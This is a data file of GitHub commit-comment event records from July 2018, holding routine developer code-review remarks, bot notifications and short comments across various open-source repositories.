{"id":"8002370498","type":"CommitCommentEvent","actor":{"login":"semihalf-ostruszka-andrzej"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29797043,"position":40,"line":87,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"e1b1140cc264e81890e1340ad8940fb11b847f8c","created_at":"2018-07-23T08:16:16Z","updated_at":"2018-07-23T08:16:16Z","author_association":"NONE","body":"Does not looks like it ... but it is related.  When draining the TX ring I reparse the packet in order to find the port against which I should count the stats in case the packet has failed - Shlomi wanted this.  So in order to do this without code duplication I introduced \"match callbacks\" (match_cb) and this one is for VLAN.  Once I added these match functions I've also reused them in the dispatch callbacks."}},"created_at":"2018-07-23T08:16:16Z"}
{"id":"8002371256","type":"CommitCommentEvent","actor":{"login":"mercury233"},"repo":{"name":"Fluorohydride/ygopro-pre-script"},"payload":{"comment":{"id":29797048,"position":null,"line":null,"path":null,"commit_id":"6592c2cde355888c243bce95ec9c7cd796a00f5b","created_at":"2018-07-23T08:16:26Z","updated_at":"2018-07-23T08:16:26Z","author_association":"COLLABORATOR","body":"shouldn't other counter reference in line 78,86,87 be updated?"}},"created_at":"2018-07-23T08:16:26Z"}
{"id":"8002371912","type":"CommitCommentEvent","actor":{"login":"wab"},"repo":{"name":"3amperes/desgranges"},"payload":{"comment":{"id":29797049,"position":null,"line":null,"path":null,"commit_id":"ad6e6db7c08a173d92542b99ab904a16eafe3a59","created_at":"2018-07-23T08:16:35Z","updated_at":"2018-07-23T08:16:35Z","author_association":"CONTRIBUTOR","body":"Ah t'as fait ça en utilisant le *context* ... cool"}},"created_at":"2018-07-23T08:16:35Z"}
{"id":"8002376872","type":"CommitCommentEvent","actor":{"login":"koura718"},"repo":{"name":"koura718/gourmetconnect"},"payload":{"comment":{"id":29797066,"position":null,"line":null,"path":null,"commit_id":"5e3abaf5100f430d4b6378b5d6ab3e5d0d7713f9","created_at":"2018-07-23T08:17:37Z","updated_at":"2018-07-23T08:17:37Z","author_association":"OWNER","body":"20180723 変更"}},"created_at":"2018-07-23T08:17:37Z"}
{"id":"8002381139","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29797076,"position":null,"line":null,"path":null,"commit_id":"e6bf4107ae89a4d9547283257674279aecaabcc6","created_at":"2018-07-23T08:18:32Z","updated_at":"2018-07-23T08:18:32Z","author_association":"NONE","body":"If this passes STC (which I hope), please rebase your test on latest master for LTC. Good luck :-)"}},"created_at":"2018-07-23T08:18:32Z"}
{"id":"8002386108","type":"CommitCommentEvent","actor":{"login":"svanniii"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29797085,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T08:19:41Z","updated_at":"2018-07-23T08:19:41Z","author_association":"NONE","body":"to the moon\n\nOn Mon, Jul 23, 2018 at 11:31 AM Aiolos13 <notifications@github.com> wrote:\n\n> Nice project\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29796633>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Aib3BTMQScKtJjf-tYeh9MgMtWTh8bAKks5uJXvAgaJpZM4VaEAl>\n> .\n>\n"}},"created_at":"2018-07-23T08:19:41Z"}
{"id":"8002391259","type":"CommitCommentEvent","actor":{"login":"kisetsu618"},"repo":{"name":"hairdorabirth/weblio"},"payload":{"comment":{"id":29797091,"position":null,"line":null,"path":null,"commit_id":"c96e9b5a988e27cb2c2b5c83505a275c17813f73","created_at":"2018-07-23T08:20:46Z","updated_at":"2018-07-23T08:20:46Z","author_association":"COLLABORATOR","body":"good job"}},"created_at":"2018-07-23T08:20:46Z"}
{"id":"8002392146","type":"CommitCommentEvent","actor":{"login":"kisetsu618"},"repo":{"name":"hairdorabirth/weblio"},"payload":{"comment":{"id":29797093,"position":null,"line":null,"path":null,"commit_id":"c96e9b5a988e27cb2c2b5c83505a275c17813f73","created_at":"2018-07-23T08:20:58Z","updated_at":"2018-07-23T08:20:58Z","author_association":"COLLABORATOR","body":"gg"}},"created_at":"2018-07-23T08:20:58Z"}
{"id":"8002399681","type":"CommitCommentEvent","actor":{"login":"medz"},"repo":{"name":"slimkit/plus"},"payload":{"comment":{"id":29797121,"position":null,"line":null,"path":null,"commit_id":"8406dd04a42724d1767cababfa001b390390d41a","created_at":"2018-07-23T08:22:36Z","updated_at":"2018-07-23T08:22:36Z","author_association":"MEMBER","body":"issue #324 "}},"created_at":"2018-07-23T08:22:36Z"}
{"id":"8002400265","type":"CommitCommentEvent","actor":{"login":"FredKruse"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29797123,"position":null,"line":null,"path":null,"commit_id":"27fa0ac209e3dda6be48169694e2e9c3cad9fa78","created_at":"2018-07-23T08:22:44Z","updated_at":"2018-07-23T08:22:44Z","author_association":"CONTRIBUTOR","body":"@MikeUnwalla , I added the attribute to the rules.xsd. The test should accept the new attribute now. "}},"created_at":"2018-07-23T08:22:44Z"}
{"id":"8002435399","type":"CommitCommentEvent","actor":{"login":"nadavlev"},"repo":{"name":"nadavlev/good_hub_food_donation"},"payload":{"comment":{"id":29797200,"position":null,"line":null,"path":null,"commit_id":"6f2f53d96b394eeddf98a93a8e33c704535733c0","created_at":"2018-07-23T08:30:10Z","updated_at":"2018-07-23T08:30:10Z","author_association":"OWNER","body":"interesting, why did you do that??"}},"created_at":"2018-07-23T08:30:10Z"}
{"id":"8002442567","type":"CommitCommentEvent","actor":{"login":"cbcruk"},"repo":{"name":"justinaus/react-redux-typescript-sample"},"payload":{"comment":{"id":29797213,"position":null,"line":null,"path":null,"commit_id":"fd3c6b2a6f2dde9d5af4b87002b4d070dd093134","created_at":"2018-07-23T08:31:36Z","updated_at":"2018-07-23T08:31:36Z","author_association":"NONE","body":"@justinaus \r\n\r\n👀"}},"created_at":"2018-07-23T08:31:36Z"}
{"id":"8002446096","type":"CommitCommentEvent","actor":{"login":"Senzdamsik"},"repo":{"name":"Senzdamsik/Javascript-API"},"payload":{"comment":{"id":29797214,"position":null,"line":null,"path":null,"commit_id":"d700b215399bc5312e1ab10da8c3c89dbbf00de6","created_at":"2018-07-23T08:32:19Z","updated_at":"2018-07-23T08:32:19Z","author_association":"OWNER","body":"Menambahkan source code untuk membuat file csv"}},"created_at":"2018-07-23T08:32:19Z"}
{"id":"8002446950","type":"CommitCommentEvent","actor":{"login":"seb-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29797217,"position":null,"line":null,"path":null,"commit_id":"762adedece1c6c2b97b282348659c1b39b988d24","created_at":"2018-07-23T08:32:29Z","updated_at":"2018-07-23T08:32:29Z","author_association":"CONTRIBUTOR","body":"Hello @celm1990,\r\n\r\nWe decided to remove those options because they made the feature too complicated while adding very little value.\r\n\r\nThe subtotal is really unnecessary, there's almost no use case for a section without subtotal.\r\n\r\nThe pagebreak was an unfortunate remove, but we believe looking forward that people should stop printing papers. So it makes less and less sense to support such feature if that adds too much complexity. \r\n\r\nIf you really need to simulate a page break now there is a workaround: you can create a note, with multiple empty lines. If you put just enough before a section, it will be just like a pagebreak.\r\n\r\n"}},"created_at":"2018-07-23T08:32:29Z"}
{"id":"8002447591","type":"CommitCommentEvent","actor":{"login":"ThersiquelG"},"repo":{"name":"ThersiquelG/BatailleNavalTest"},"payload":{"comment":{"id":29797219,"position":null,"line":null,"path":null,"commit_id":"687a11d5fe7f21429e2e055b18e4e98a2faa587c","created_at":"2018-07-23T08:32:37Z","updated_at":"2018-07-23T08:32:37Z","author_association":"OWNER","body":"Thank you !!"}},"created_at":"2018-07-23T08:32:37Z"}
{"id":"8002454481","type":"CommitCommentEvent","actor":{"login":"orelkan"},"repo":{"name":"TechnionTDK/jbs-text2json"},"payload":{"comment":{"id":29797233,"position":null,"line":null,"path":null,"commit_id":"58f030bb17a8b82358c503569aca1fa9d9546cb8","created_at":"2018-07-23T08:34:06Z","updated_at":"2018-07-23T08:34:06Z","author_association":"CONTRIBUTOR","body":"Work time:\r\n20 minutes"}},"created_at":"2018-07-23T08:34:06Z"}
{"id":"8002458568","type":"CommitCommentEvent","actor":{"login":"greatis"},"repo":{"name":"greatis/Anti-WebMiner"},"payload":{"comment":{"id":29797241,"position":null,"line":null,"path":null,"commit_id":"84166afea5ea0bfb934edeb586a8a337a6091f27","created_at":"2018-07-23T08:34:56Z","updated_at":"2018-07-23T08:34:56Z","author_association":"OWNER","body":"Removed."}},"created_at":"2018-07-23T08:34:56Z"}
{"id":"8002460311","type":"CommitCommentEvent","actor":{"login":"jbrichau"},"repo":{"name":"pharo-project/pharo"},"payload":{"comment":{"id":29797242,"position":null,"line":null,"path":null,"commit_id":"9e442addff3790af0c78dbc73f1f349de8a4ad03","created_at":"2018-07-23T08:35:17Z","updated_at":"2018-07-23T08:35:17Z","author_association":"NONE","body":"Hi @guillep \r\nThis change breaks expected behavior of ReadWriteStream in Grease. See https://travis-ci.org/SeasideSt/Grease/jobs/406766720\r\n\r\nMore specifically, the following used to be the case in Pharo <= 6, but no longer in 7:\r\n\r\n```\r\n| stream |\r\nstream := ReadWriteStream on: String new.\r\nstream\r\n\tnextPutAll: 'abc';\r\n\treset.\r\nself assert: stream contents = 'abc’.\r\n```\r\nThe rationale is that a `reset` a stream only resets the position and the contents of ReadWriteStream should also return the future elements on the stream. \r\n\r\nAlso, the following fails, which seems strange as a ReadWriteStream should work like a ReadStream as well:\r\n```\r\n\t| stream |\r\n\tstream := ReadWriteStream on: 'abc'.\r\n\tself assert: stream position = 0.\r\n\tself assert: stream contents = 'abc'.\r\n```\r\n\r\n\r\nCould you perhaps elaborate on why this change was made? I want to make sure we get Grease and Seaside running correctly. Thx."}},"created_at":"2018-07-23T08:35:17Z"}
{"id":"8002460885","type":"CommitCommentEvent","actor":{"login":"zx9506"},"repo":{"name":"mz-automation/libiec61850"},"payload":{"comment":{"id":29797243,"position":null,"line":null,"path":null,"commit_id":"b5cb80868c6557b88bc7203868a8e3d390ef0ae9","created_at":"2018-07-23T08:35:24Z","updated_at":"2018-07-23T08:35:24Z","author_association":"NONE","body":"Use this version iedscout less error on connecting tip.!"}},"created_at":"2018-07-23T08:35:24Z"}
{"id":"8002467414","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29797257,"position":78,"line":139,"path":"core/descriptors/src/org/jetbrains/kotlin/builtins/suspendFunctionTypes.kt","commit_id":"29c334a828f27e27388eba4da8840b049af722c9","created_at":"2018-07-23T08:36:45Z","updated_at":"2018-07-23T08:36:45Z","author_association":"MEMBER","body":"I'd prefer to have another boolean flag in `DeserializedSimpleFunctionDescriptor` near to `org.jetbrains.kotlin.serialization.deserialization.descriptors.DeserializedMemberDescriptor#getVersionRequirement`\r\nand the relevant checks in `org.jetbrains.kotlin.resolve.DeprecationResolver#getDeprecationByVersionRequirement`\r\n\r\nIt'd look more natural to me, since the version requirement limitation is what exactly happens here"}},"created_at":"2018-07-23T08:36:45Z"}
{"id":"8002475254","type":"CommitCommentEvent","actor":{"login":"alaac4q"},"repo":{"name":"alaac4q/Developers-Social-Network-App"},"payload":{"comment":{"id":29797271,"position":null,"line":null,"path":null,"commit_id":"1c53ec3c33f31fe2d19fe0049de240ae02f0936f","created_at":"2018-07-23T08:38:20Z","updated_at":"2018-07-23T08:38:20Z","author_association":"OWNER","body":"<img width=\"1402\" alt=\"screen shot 2018-07-23 at 3 41 50 am\" src=\"https://user-images.githubusercontent.com/32101657/43066013-89259bfc-8e31-11e8-9a14-d5b5ecc46438.png\">"}},"created_at":"2018-07-23T08:38:20Z"}
{"id":"8002475370","type":"CommitCommentEvent","actor":{"login":"kashif-official"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29797272,"position":null,"line":null,"path":null,"commit_id":"cd49233765f547b28d8162a7ae8927fceb585799","created_at":"2018-07-23T08:38:21Z","updated_at":"2018-07-23T08:38:21Z","author_association":"NONE","body":"![error](https://user-images.githubusercontent.com/41569091/43066149-50d64d5e-8e7d-11e8-84dc-4cfeeaeb8036.PNG)\r\n\r\nAfter enabling the SSL and adding its https url to properties=>web when i run this project i am facing this issue that Your connection is not private .. How can i resolve this issue .. please anyone help me"}},"created_at":"2018-07-23T08:38:21Z"}
{"id":"8002477342","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29797278,"position":92,"line":153,"path":"core/descriptors/src/org/jetbrains/kotlin/builtins/suspendFunctionTypes.kt","commit_id":"29c334a828f27e27388eba4da8840b049af722c9","created_at":"2018-07-23T08:38:45Z","updated_at":"2018-07-23T08:38:45Z","author_association":"MEMBER","body":"I'd prefer a less concise message like `This part of coroutine-related API has been compiled in pre-release (experimental) mode and cannot be used with language-version 1.3`"}},"created_at":"2018-07-23T08:38:45Z"}
{"id":"8002485431","type":"CommitCommentEvent","actor":{"login":"ranjithwingrider"},"repo":{"name":"kmova/k8s-charts"},"payload":{"comment":{"id":29797292,"position":null,"line":null,"path":null,"commit_id":"f5f7cdff32f63108e0c3d30bef54494d4d9c67d0","created_at":"2018-07-23T08:40:25Z","updated_at":"2018-07-23T08:40:25Z","author_association":"NONE","body":"Good to me also."}},"created_at":"2018-07-23T08:40:25Z"}
{"id":"8002488857","type":"CommitCommentEvent","actor":{"login":"nirvn"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":29797297,"position":null,"line":null,"path":null,"commit_id":"b3fb647edef5ac536d610ad9d36a9a3b8ef34a52","created_at":"2018-07-23T08:41:07Z","updated_at":"2018-07-23T08:41:07Z","author_association":"CONTRIBUTOR","body":"@wonder-sk , nice, it does fix the crasher."}},"created_at":"2018-07-23T08:41:07Z"}
{"id":"8002489151","type":"CommitCommentEvent","actor":{"login":"nayish"},"repo":{"name":"wix/wix-style-react"},"payload":{"comment":{"id":29797298,"position":5,"line":10,"path":"testkit/puppeteer.js","commit_id":"644c8950d0d46f10f7ca42bcac867dd6c5e13712","created_at":"2018-07-23T08:41:10Z","updated_at":"2018-07-23T08:41:10Z","author_association":"NONE","body":"@lbelinsk, why was this deleted?"}},"created_at":"2018-07-23T08:41:10Z"}
{"id":"8002493617","type":"CommitCommentEvent","actor":{"login":"alaac4q"},"repo":{"name":"alaac4q/Developers-Social-Network-App"},"payload":{"comment":{"id":29797305,"position":null,"line":null,"path":null,"commit_id":"1c53ec3c33f31fe2d19fe0049de240ae02f0936f","created_at":"2018-07-23T08:42:05Z","updated_at":"2018-07-23T08:42:05Z","author_association":"OWNER","body":"<img width=\"1402\" alt=\"screen shot 2018-07-23 at 3 41 50 am\" src=\"https://user-images.githubusercontent.com/32101657/43066013-89259bfc-8e31-11e8-9a14-d5b5ecc46438.png\">"}},"created_at":"2018-07-23T08:42:05Z"}
{"id":"8002495053","type":"CommitCommentEvent","actor":{"login":"RedFantom"},"repo":{"name":"RedFantom/ttkwidgets"},"payload":{"comment":{"id":29797309,"position":null,"line":null,"path":null,"commit_id":"aadc547ba294cb4577aa2c968421189bf82ab82c","created_at":"2018-07-23T08:42:22Z","updated_at":"2018-07-23T08:42:22Z","author_association":"OWNER","body":"Looking good! I saw you had a `#TODO` for checking how it looks on Windows. This is the result in my VM with Python 3.7:\r\n![screenshot from 2018-07-23 10-32-31](https://user-images.githubusercontent.com/15170036/43066051-eac20ea4-8e63-11e8-99bf-d4ccf355d21a.png)\r\nComparing it with how it looks on my main OS (Ubuntu with Python 3.6), also with theme `alt`, I can't distinguish them when ignoring the window decorations and other widgets, as it should be.\r\n\r\nI have not yet looked at the full code, only given it a quick glance, but I did see that `11` is sorted before `2`, is that intentional?"}},"created_at":"2018-07-23T08:42:22Z"}
{"id":"8002500524","type":"CommitCommentEvent","actor":{"login":"melissa-thompson"},"repo":{"name":"melissa-thompson/apidocs"},"payload":{"comment":{"id":29797322,"position":null,"line":null,"path":null,"commit_id":"adccd82cd3dbdcf025e64f01b555047f6dc870f5","created_at":"2018-07-23T08:43:29Z","updated_at":"2018-07-23T08:43:29Z","author_association":"OWNER","body":"Inital Page"}},"created_at":"2018-07-23T08:43:29Z"}
{"id":"8002500741","type":"CommitCommentEvent","actor":{"login":"alaac4q"},"repo":{"name":"alaac4q/Developers-Social-Network-App"},"payload":{"comment":{"id":29797323,"position":1,"line":1,"path":"README.md","commit_id":"1c53ec3c33f31fe2d19fe0049de240ae02f0936f","created_at":"2018-07-23T08:43:32Z","updated_at":"2018-07-23T08:43:32Z","author_association":"OWNER","body":"<img width=\"1402\" alt=\"screen shot 2018-07-23 at 3 41 50 am\" src=\"https://user-images.githubusercontent.com/32101657/43066542-f1ee4dfe-8e32-11e8-9a76-67bcc825194d.png\">\r\n"}},"created_at":"2018-07-23T08:43:32Z"}
{"id":"8002503495","type":"CommitCommentEvent","actor":{"login":"melissa-thompson"},"repo":{"name":"melissa-thompson/apidocs"},"payload":{"comment":{"id":29797326,"position":null,"line":null,"path":null,"commit_id":"adccd82cd3dbdcf025e64f01b555047f6dc870f5","created_at":"2018-07-23T08:44:05Z","updated_at":"2018-07-23T08:44:05Z","author_association":"OWNER","body":"Inital Page"}},"created_at":"2018-07-23T08:44:05Z"}
{"id":"8002505562","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29797331,"position":58,"line":105,"path":"core/descriptors/src/org/jetbrains/kotlin/builtins/suspendFunctionTypes.kt","commit_id":"29c334a828f27e27388eba4da8840b049af722c9","created_at":"2018-07-23T08:44:30Z","updated_at":"2018-07-23T08:44:30Z","author_association":"MEMBER","body":"Please, try to avoid copy-pasting code for function type creation"}},"created_at":"2018-07-23T08:44:30Z"}
{"id":"8002512362","type":"CommitCommentEvent","actor":{"login":"libliang17"},"repo":{"name":"zhejiangxiaomai/mariadb-connector-j"},"payload":{"comment":{"id":29797342,"position":68,"line":481,"path":"src/main/java/org/mariadb/jdbc/internal/protocol/AbstractConnectProtocol.java","commit_id":"4b7045a22883178648e93f28c54af2901aec9202","created_at":"2018-07-23T08:45:51Z","updated_at":"2018-07-23T08:45:51Z","author_association":"NONE","body":"need to check whether the  redirected host/port/username are equal to the original host/port/username  or not, if they are equal, no need to redirect"}},"created_at":"2018-07-23T08:45:51Z"}
{"id":"8002517201","type":"CommitCommentEvent","actor":{"login":"destdev"},"repo":{"name":"Fluorohydride/ygopro-pre-script"},"payload":{"comment":{"id":29797352,"position":null,"line":null,"path":null,"commit_id":"6592c2cde355888c243bce95ec9c7cd796a00f5b","created_at":"2018-07-23T08:46:47Z","updated_at":"2018-07-23T08:46:47Z","author_association":"COLLABORATOR","body":"of course, that was an oversight on my part, sorry"}},"created_at":"2018-07-23T08:46:47Z"}
{"id":"8002523356","type":"CommitCommentEvent","actor":{"login":"dadoonet"},"repo":{"name":"dadoonet/elasticsearch-beyonder"},"payload":{"comment":{"id":29797359,"position":null,"line":null,"path":null,"commit_id":"1e6b468faf0c3da9b0e9cc13b70a8e4f30a6ba80","created_at":"2018-07-23T08:48:02Z","updated_at":"2018-07-23T08:48:02Z","author_association":"OWNER","body":"@ches Good news! I just released the version 6.3! https://discuss.elastic.co/t/announcement-elasticsearch-beyonder-6-3-released/141010"}},"created_at":"2018-07-23T08:48:02Z"}
{"id":"8002525719","type":"CommitCommentEvent","actor":{"login":"r12a"},"repo":{"name":"aphillips/charmod-norm"},"payload":{"comment":{"id":29797365,"position":23,"line":1365,"path":"index.html","commit_id":"b359ebb35ebe28ecf8f083702648b5c22ada010f","created_at":"2018-07-23T08:48:31Z","updated_at":"2018-07-23T08:48:31Z","author_association":"NONE","body":"speciafication->specification"}},"created_at":"2018-07-23T08:48:31Z"}
{"id":"8002537966","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29797395,"position":null,"line":null,"path":null,"commit_id":"368d4e8eae5b721dd56a4a6438087382e51562bd","created_at":"2018-07-23T08:50:58Z","updated_at":"2018-07-23T08:50:58Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/new-post-notifications-not-received-for-whispers-in-watched-categories/89747/6\n"}},"created_at":"2018-07-23T08:50:58Z"}
{"id":"8002539742","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29797397,"position":52,"line":99,"path":"core/descriptors/src/org/jetbrains/kotlin/builtins/suspendFunctionTypes.kt","commit_id":"29c334a828f27e27388eba4da8840b049af722c9","created_at":"2018-07-23T08:51:19Z","updated_at":"2018-07-23T08:51:19Z","author_association":"MEMBER","body":"Probably, it'd be simpler if you made a mutable property like `wasThereObsoleteSuspendFunctionType` in `DeserializationContext`"}},"created_at":"2018-07-23T08:51:19Z"}
{"id":"8002543812","type":"CommitCommentEvent","actor":{"login":"subodh-malgonde"},"repo":{"name":"subodh-malgonde/razor_imu_9dof"},"payload":{"comment":{"id":29797405,"position":null,"line":null,"path":null,"commit_id":"d05eec16a50eb1507198d88c8bf6b048faab4661","created_at":"2018-07-23T08:52:10Z","updated_at":"2018-07-23T08:52:10Z","author_association":"OWNER","body":"Source for the visualization sketch is this https://github.com/KristofRobot/razor_imu_9dof/issues/43#issuecomment-406983411"}},"created_at":"2018-07-23T08:52:10Z"}
{"id":"8002545867","type":"CommitCommentEvent","actor":{"login":"guillaumebriday"},"repo":{"name":"dualshote/todolist-angular"},"payload":{"comment":{"id":29797409,"position":32,"line":109,"path":"src/app/core/alert/alert.service.ts","commit_id":"b0272d6222a955cbcbe19ce10c47dad36fdf3aa0","created_at":"2018-07-23T08:52:33Z","updated_at":"2018-07-23T08:52:33Z","author_association":"NONE","body":"Tu peux pas faire un template pour ca plutôt que des strings ?"}},"created_at":"2018-07-23T08:52:33Z"}
{"id":"8002546081","type":"CommitCommentEvent","actor":{"login":"alaac4q"},"repo":{"name":"alaac4q/Developers-Social-Network-App"},"payload":{"comment":{"id":29797411,"position":null,"line":null,"path":null,"commit_id":"399a68d15cec8024bd411809914e57e590a4fc4f","created_at":"2018-07-23T08:52:35Z","updated_at":"2018-07-23T08:52:35Z","author_association":"OWNER","body":"<img width=\"1402\" alt=\"screen shot 2018-07-23 at 3 41 50 am\" src=\"https://user-images.githubusercontent.com/32101657/43067008-2e0f97a6-8e34-11e8-8bca-5e6a030df0c6.png\">\r\n"}},"created_at":"2018-07-23T08:52:35Z"}
{"id":"8002547358","type":"CommitCommentEvent","actor":{"login":"andreineculau"},"repo":{"name":"tobiipro/aws-util-firecloud"},"payload":{"comment":{"id":29797415,"position":null,"line":null,"path":null,"commit_id":"2609838142d311a9640e554f56a2b5b773d60525","created_at":"2018-07-23T08:52:50Z","updated_at":"2018-07-23T08:52:50Z","author_association":"MEMBER","body":"> I don't think I agree.\r\n\r\nI think you do :) \"if something goes bad, there's no execution time report printed\"\r\n* \"if something goes bad\" -> your excerpt of START END REPORT is in a successful run, but also in a non-debug env\r\n* \"there's no execution time report printed\" -> our execution time report that is, not the REPORT entry from AWS, because this line is never reached on a crash (say while fetching the env ctx) https://github.com/tobiipro/aws-util-firecloud/commit/2609838142d311a9640e554f56a2b5b773d60525#diff-2d5a4ee2f7e0d10b0ad3cb3501ef175aR367\r\n\r\n> I can leave 2 log messages in lambda bootstrap and express bootstrap just before running fn code with \"info\" level. They will carry timestamp and it will be easy to see if something failed even before running fn code.\r\n\r\nmeaning you don't want to add the ctx.log.info call inside ctx.trackTime ?! because that's what i'd do, but it sounds like you have other plans\r\n\r\n\"not bored and works like a Swiss clockwork\" already sounds too good to be true :)\r\n\r\n> it influenced the performance of AWS log viewer (we should not care about it, ofc, but the fact is fact). Once, due to the number of logs in one of the log groups (lambda/prod/atex-events) search and enumeration of log streams stopped working completely until I removed and recreated this logs group. AWS support couldn't help and that's the only option I had. And that's not cool, because I lost relevant logs. It's not our fault, but that's a reality.\r\n\r\nWAAAAATTT? 😂 but number of streams/logs != number of lines in a log. Furthermore removing 18 lines (one start, one end for 9 _.consoleLogTime) cannot possible be a game-changer, especially if you'll bring back the start entry (delta of 9 lines). I don't remember what is the retention for the prod env, but maybe you can cut that down"}},"created_at":"2018-07-23T08:52:50Z"}
{"id":"8002547671","type":"CommitCommentEvent","actor":{"login":"AlexOfABC"},"repo":{"name":"vuejs/vue"},"payload":{"comment":{"id":29797417,"position":null,"line":null,"path":null,"commit_id":"cf0b1b745f6b98f4e010f2e0b4c2351bb5a7b812","created_at":"2018-07-23T08:52:54Z","updated_at":"2018-07-23T08:52:54Z","author_association":"NONE","body":"hello world"}},"created_at":"2018-07-23T08:52:54Z"}
{"id":"8002548359","type":"CommitCommentEvent","actor":{"login":"r12a"},"repo":{"name":"aphillips/charmod-norm"},"payload":{"comment":{"id":29797420,"position":60,"line":1392,"path":"index.html","commit_id":"b359ebb35ebe28ecf8f083702648b5c22ada010f","created_at":"2018-07-23T08:53:02Z","updated_at":"2018-07-23T08:53:02Z","author_association":"NONE","body":"applicable to -> appropriate for (?)"}},"created_at":"2018-07-23T08:53:02Z"}
{"id":"8002550879","type":"CommitCommentEvent","actor":{"login":"riverdjsl"},"repo":{"name":"riverdjsl/mu_factor"},"payload":{"comment":{"id":29797427,"position":9,"line":218,"path":"C.py","commit_id":"556671691b09008557bfcc958bafec5d4cadfbc8","created_at":"2018-07-23T08:53:31Z","updated_at":"2018-07-23T08:53:31Z","author_association":"OWNER","body":"增加了柱托杆的计算文件"}},"created_at":"2018-07-23T08:53:31Z"}
{"id":"8002558120","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/orange3-text-feedstock"},"payload":{"comment":{"id":29797440,"position":null,"line":null,"path":null,"commit_id":"a0b3e34cfbc4de0a2bab982fa80609cda8ed498d","created_at":"2018-07-23T08:54:56Z","updated_at":"2018-07-23T08:54:56Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @ajdapretnar was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-23T08:54:56Z"}
{"id":"8002558994","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29797441,"position":72,"line":194,"path":"core/deserialization/src/org/jetbrains/kotlin/serialization/deserialization/MemberDeserializer.kt","commit_id":"a27c04d2b19415e36392dcf5cc24f383221bb366","created_at":"2018-07-23T08:55:08Z","updated_at":"2018-07-23T08:55:08Z","author_association":"MEMBER","body":"Looks like these changes might be unnecessary once you put a property into the context\r\n(https://github.com/JetBrains/kotlin/commit/29c334a828f27e27388eba4da8840b049af722c9#r29797397)"}},"created_at":"2018-07-23T08:55:08Z"}
{"id":"8002560549","type":"CommitCommentEvent","actor":{"login":"alaac4q"},"repo":{"name":"alaac4q/Developers-Social-Network-App"},"payload":{"comment":{"id":29797443,"position":null,"line":null,"path":null,"commit_id":"a24dee2d51f14ac2072f0f178de2d22bed7d3b23","created_at":"2018-07-23T08:55:25Z","updated_at":"2018-07-23T08:55:25Z","author_association":"OWNER","body":"<img width=\"1431\" alt=\"screen shot 2018-07-23 at 3 42 14 am\" src=\"https://user-images.githubusercontent.com/32101657/43067134-75470b0e-8e34-11e8-95e6-ffbcb96566c3.png\">\r\n\r\n<img width=\"1431\" alt=\"screen shot 2018-07-23 at 3 42 14 am\" src=\"https://user-images.githubusercontent.com/32101657/43067134-75470b0e-8e34-11e8-95e6-ffbcb96566c3.png\">\r\n"}},"created_at":"2018-07-23T08:55:25Z"}
{"id":"8002564392","type":"CommitCommentEvent","actor":{"login":"r12a"},"repo":{"name":"aphillips/charmod-norm"},"payload":{"comment":{"id":29797449,"position":83,"line":1415,"path":"index.html","commit_id":"b359ebb35ebe28ecf8f083702648b5c22ada010f","created_at":"2018-07-23T08:56:13Z","updated_at":"2018-07-23T08:56:13Z","author_association":"NONE","body":"I always find i have to stop and think about the meaning of the term 'case-insensitivity' to make sure i'm thinking the right way around.  Could we substitute 'case-folding' here?  That's much easier for me to grok, i don't know about others."}},"created_at":"2018-07-23T08:56:13Z"}
{"id":"8002564567","type":"CommitCommentEvent","actor":{"login":"hassano16007"},"repo":{"name":"hassano16007/my_testgithub"},"payload":{"comment":{"id":29797450,"position":null,"line":null,"path":null,"commit_id":"5c0a284d290cd5f5dbda2f8b3f002d1e95cfbeea","created_at":"2018-07-23T08:56:15Z","updated_at":"2018-07-23T08:56:15Z","author_association":"OWNER","body":"ch02"}},"created_at":"2018-07-23T08:56:15Z"}
{"id":"8002579535","type":"CommitCommentEvent","actor":{"login":"CAMAProyects"},"repo":{"name":"CAMAProyects/Hola-Mundo"},"payload":{"comment":{"id":29797467,"position":null,"line":null,"path":null,"commit_id":"6f12a93837375e6b8b9e1cfb627a094416e86aa2","created_at":"2018-07-23T08:59:12Z","updated_at":"2018-07-23T08:59:12Z","author_association":"OWNER","body":"v1.0.0"}},"created_at":"2018-07-23T08:59:12Z"}
